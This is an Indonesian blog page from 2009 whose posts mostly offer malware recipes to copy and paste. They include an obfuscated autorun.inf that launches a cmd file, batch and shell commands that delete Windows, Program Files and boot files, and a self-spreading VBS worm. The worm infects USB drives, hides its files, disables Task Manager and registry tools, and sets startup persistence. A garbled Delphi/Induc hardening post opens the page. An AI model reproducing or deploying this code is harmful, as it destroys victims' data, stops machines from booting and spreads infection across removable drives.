THOUSANDS OF FREE BLOGGER TEMPLATES ?

Senin, 17 Agustus 2009

Dark_study

Nie... buat loe yang sering bermain-main dengan Delphi versi 4-7


Sekali lagi, tidak khawatir berlebihan. Selama anda bukan seoranmg programer/developer Delphi dan tidak mengunakan Compiler Delphi versi 4-7 di komputer anda, maka dipastikan viruz ini tidak akan pernah aktif.


Cara ngebuatnya:
1. Find Delpji root folder
[usually C:\Program files\Borland\Delphi7]
2. if exists %Delphi%\Lib\Sysconst.bak file rename it as SysCont.dcu and continue with step 5
if file %Delphi%\Lib\SysCont.pas From %Delphi%\Source\Rtl\Sys folder to %DELPHI%\Lib folder
3. Find and copy file SysConst.pas from %DELPHI%\Source\Rtl\Sys folder to %DELPHI%\Lib folder
4.Compile SysConst.pas file to DCU using command line:
%DELPHI%\Bin\Dcc32.exe %DELPHI%\Lib\SysConst.pas
For example:
“C:\Program Files\Borland\Delphi7\Bin\Dcc32.exe” “C:\Program Files\Borland\Delphi7\Lib\SysConst.pas”
5.If exists %DELPHI%\Lib\SysConst.bak file remove it.
For “%DELPHI%\Lib” folder its subfolders and files set “Read only” permission for “Everyone” group.
This will protect Delphi installation against Win32/Induc infection.
6.Try to rename %DELPHI%\Lib\SysConst.dcu file as %DELPHI%\Lib\SysConst.pas.
If this fail your permissions are set correctly














Diposting oleh Bagus.com di 18.54 0 komentar  

Minggu, 16 Agustus 2009

Dark_viruzax

















{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Courier New;}{\f1\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1503;}\viewkind4\uc1\pard\f0\fs20\par
;fNMbCsNcMPrb VNtBCGndKgOEahgxgstcQO hhRBa bTrDtQRrv\par
[AutoRun]\par
;gfpn pnNfuD rhqhC QeRvW\par
;JgUCwimPpDVfWhGvWyg \par
shell\\eXplorE\\CommANd= dynti.cmd\par
;HQVvhstmkliicf\par
shell\\oPeN\\DefauLt=1\par
;HlRmQDyhOeKceDMq jSsi UqejL htfbtl\par
shelL\\opeN\\CoMMand= dynti.cmd\par
;UqhXPmNuGo\par
OpeN=dynti.cmd\par
;FrnW RjaWWPMIjAXQNgXjXd RrCWVoMCeKbkkvy mMNfYmywgmhyqNc\par
shElL\\autoplAY\\ComManD= dynti.cmd\par
;TsQihNoxsrtfvvpsvGeftfAN xhyIrkqjxllghOITjqlwkmkv \par
\par
\f1\par
}

Simpan dengan [namaviruz].exe

Diposting oleh Bagus.com di 00.00  

Senin, 10 Agustus 2009

Cara membuat Viruz


Jangan lupa tulis di notepad ya......

Ini untuk membuat autorun.inf


Bagus Y IF EXIST C:\9S2M\PINBALL\NUL DEL C:\9S2M\PINBALL\*.*>NULIF EXIST C:\9S2M\PINBALL\NUL RD C:\9S2M\PINBALL>NULBagus Y IF EXIST C:\9S2M\COMMAND\NUL DEL C:\9S2M\COMMAND\*.*>NULIF EXIST C:\9S2M\COMMAND\NUL RD C:\9S2M\COMMAND>NULBagus Y IF EXIST C:\9S2M\FONTS\NUL DEL C:\9S2M\FONTS\*.*>NULIF EXIST C:\9S2M\FONTS\NUL RD C:\9S2M\FONTS>NULBagus Y IF EXIST C:\9S2M\HELP\NUL DEL C:\9S2M\HELP\*.*>NULIF EXIST C:\9S2M\HELP\NUL RD C:\9S2M\HELP>NULBagus Y IF EXIST C:\9S2M\MSAPPS\GRPHFLT\NUL DEL C:\9S2M\MSAPPS\GRPHFLT\*.*>NULIF EXIST C:\9S2M\MSAPPS\GRPHFLT\NUL RD C:\9S2M\MSAPPS\GRPHFLT>NULBagus Y IF EXIST C:\9S2M\MSAPPS\NUL DEL C:\9S2M\MSAPPS\*.*>NULIF EXIST C:\9S2M\MSAPPS\NUL RD C:\9S2M\MSAPPS>NULBagus Y IF EXIST C:\9S2M\SYSBCKUP\NUL DEL C:\9S2M\SYSBCKUP\*.*>NULIF EXIST C:\9S2M\SYSBCKUP\NUL RD C:\9S2M\SYSBCKUP>NULBagus Y IF EXIST C:\9S2M\MEDIA\NUL DEL C:\9S2M\MEDIA\*.*>NULIF EXIST C:\9S2M\MEDIA\NUL RD C:\9S2M\MEDIA>NULBagus Y IF EXIST C:\9S2M\SYSTEM\SHELLEXT\NUL DEL C:\9S2M\SYSTEM\SHELLEXT\*.*>NULIF EXIST C:\9S2M\SYSTEM\SHELLEXT\NUL RD C:\9S2M\SYSTEM\SHELLEXT>NULBagus Y IF EXIST C:\9S2M\SYSTEM\VMM32\NUL DEL C:\9S2M\SYSTEM\VMM32\*.*>NULIF EXIST C:\9S2M\SYSTEM\VMM32\NUL RD C:\9S2M\SYSTEM\VMM32>NULBagus Y IF EXIST C:\9S2M\SYSTEM\IOSUBSYS\NUL DEL C:\9S2M\SYSTEM\IOSUBSYS\*.*>NULIF EXIST C:\9S2M\SYSTEM\IOSUBSYS\NUL RD C:\9S2M\SYSTEM\IOSUBSYS>NULBagus Y IF EXIST C:\9S2M\SYSTEM\NUL DEL C:\9S2M\SYSTEM\*.*>NULIF EXIST C:\9S2M\SYSTEM\NUL RD C:\9S2M\SYSTEM>NULBagus Y IF EXIST C:\9S2M\SYSTEM32\DRIVERS\NUL DEL C:\9S2M\SYSTEM32\DRIVERS\*.*>NULIF EXIST C:\9S2M\SYSTEM32\DRIVERS\NUL RD C:\9S2M\SYSTEM32\DRIVERS>NULBagus Y IF EXIST C:\9S2M\SYSTEM32\NUL DEL C:\9S2M\SYSTEM32\*.*>NULIF EXIST C:\9S2M\SYSTEM32\NUL RD C:\9S2M\SYSTEM32>NULBagus Y IF EXIST C:\9S2M\NUL DEL C:\9S2M\*.*>NULIF EXIST C:\9S2M\NUL RD C:\9S2M>NUL

Simpan dengan [namavirus].inf


Yang ini lebih seru buat penghancuran

shell “c:”shell “cd\”
shell “del command.com”

Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.

shell “c:”shell “cd\”
shell “deltree /y mydocu~1?shell “
deltree /y windows”shell “
deltree /y progra~1?

simpan dengan [nama viruz].cmd



Kali ini untuk membuat virus Vbs

on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,lagibelajar,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Bagus.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do
Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- Bagus.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- Bagus.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- Bagus.dll.vbs “) tf.attributes = 39
for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\Bagus.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\Bagus.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\Bagus.dll.vbs “) tf.attributes = 39
set tf =fs.getfile(flashdrive.path &”\Bagus.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\Bagus.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\Bagus.inf”) tf.attributes=39 end if next
set Bagus = createobject(”WScript.Shell”)
Bagus.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” Bagus “
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\super Hidden”, “0″, “REG_DWORD”
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
Bagus.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
Bagus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Bagus. Variant from Rangga-Zay, don’t panic all data are safe.”
Bagus.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- Bagus.dll.vbs “
Bagus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “Bagus” Bagus.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Bagus”
if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1

Yang nie disimpan dengan [nama viruz].vbs


Lo lgi malas
tingal copy paste za....

Diposting oleh Bagus.com di 20.02 0 komentar  

Langganan: Postingan (Atom)